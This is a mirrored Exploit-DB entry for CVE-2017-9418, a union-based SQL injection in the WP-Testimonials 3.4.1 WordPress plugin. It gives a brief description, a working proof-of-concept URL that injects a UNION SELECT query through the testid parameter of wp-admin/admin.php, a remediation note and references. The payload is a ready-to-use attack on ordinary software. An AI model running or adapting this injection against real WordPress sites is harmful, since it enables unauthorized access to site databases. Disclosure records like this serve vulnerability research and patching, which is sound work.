bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/42166.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

42 lines
No EOL
1 KiB
Text
Raw Blame History

# Exploit Title: WP-Testimonials < 3.4.1 Union Based SQL Injection
# Date: 03-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/
# Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/
# Version: 3.4.1
# CVE : CVE-2017-9418
# Category: webapps
1. Description:
SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for
WordPress allows an authenticated user to execute arbitrary SQL commands via
the testid parameter to wp-admin/admin.php.
2. Proof of Concept:
http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedi
t&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL--
comment
3. Solution:
The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.
4. Reference:
http://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-inje
ction-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9418
Reference in a new issue View git blame Copy permalink